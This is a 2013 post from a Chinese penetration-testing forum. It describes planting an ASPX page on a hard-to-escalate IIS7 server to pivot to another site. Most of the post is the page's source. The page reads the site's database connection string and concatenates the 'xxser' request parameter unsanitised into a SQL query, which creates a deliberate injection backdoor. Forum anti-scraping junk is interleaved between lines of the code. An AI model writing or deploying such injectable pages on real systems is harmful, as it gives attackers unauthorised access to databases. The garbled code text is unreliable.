中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
5 m/ y4 ]: F( p
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
* ` B, d7 Y# S7 @& V r% o: F! e( W
代码量不多,自己写个拉倒了。烦死了。
5 u R% t7 j" b( q5 h* A' z
6 ~) ~5 x! Y( Q- ^
1 a# } h/ y( b4 w6 O9 Y
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
& y+ p4 P9 l1 `- r, ^1 Y
<html xmlns="http://www.w3.org/1999/xhtml">
2 ^4 A. k) G- F" \) d8 q
<head runat="server">
0 N/ |* i; C* W- D
<title>暗影aspx构造注射专用页面</title>
4 u( ]6 L' g7 z5 }3 O
</head>
1 ?3 n i8 s0 C" F
<body>
$ }# W {. r' o% `3 v1 B' \
<form id="form1" runat="server">
4 u7 L- Y4 k3 y x2 A" N8 x
<div>
# E1 J' j$ X. L3 G
<script language="c#" runat="server">
! D+ W% F8 w1 W5 s* f* o( ^
: S$ l" O. J) q ^( r
void page_init(object sender, EventArgs e)
. `1 L/ [% N# ~0 x2 b+ W9 R
{
9 n4 u _1 Z( n) n6 `. ] t/ |) L
- B& k$ F; [7 R& P4 [8 s! e+ R
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
Q( C) }6 |7 h! N8 e
- ^, w1 R x0 r& Y
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
( n5 V. p* k2 W, }0 u
conn.Open();
5 [0 x. K1 K) O1 \8 o' b
9 @, z9 D8 T+ @9 w4 D1 \0 [! m
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
" x! w8 n7 z% X
4 O4 G% L0 j6 ?3 G
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
! B. z$ ~, k$ s" F' [* K; F/ w3 A' V
int x = command.ExecuteNonQuery();
9 `8 M! F. Y7 I) K% s, F
Response.Write(i+"\n");
3 _9 i! z# y X( n/ K6 K/ J
Response.Write(x);
, d4 P( p4 {% z8 N3 Q( o
conn.Close();
- w2 J$ }8 y- h P7 S
}
( m& K3 u: y$ H! g/ P
; n# k+ |/ X( m
</script>
$ G: `8 ^& M0 r5 U
</div>
/ ?( J; A8 [. K4 J1 }
</form>
' d7 u0 d0 R7 \- H, A9 l
</body>
8 X, }( X5 K( C( X. A2 J6 M; l
</html>
' O7 N4 h& }2 d( g1 b [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2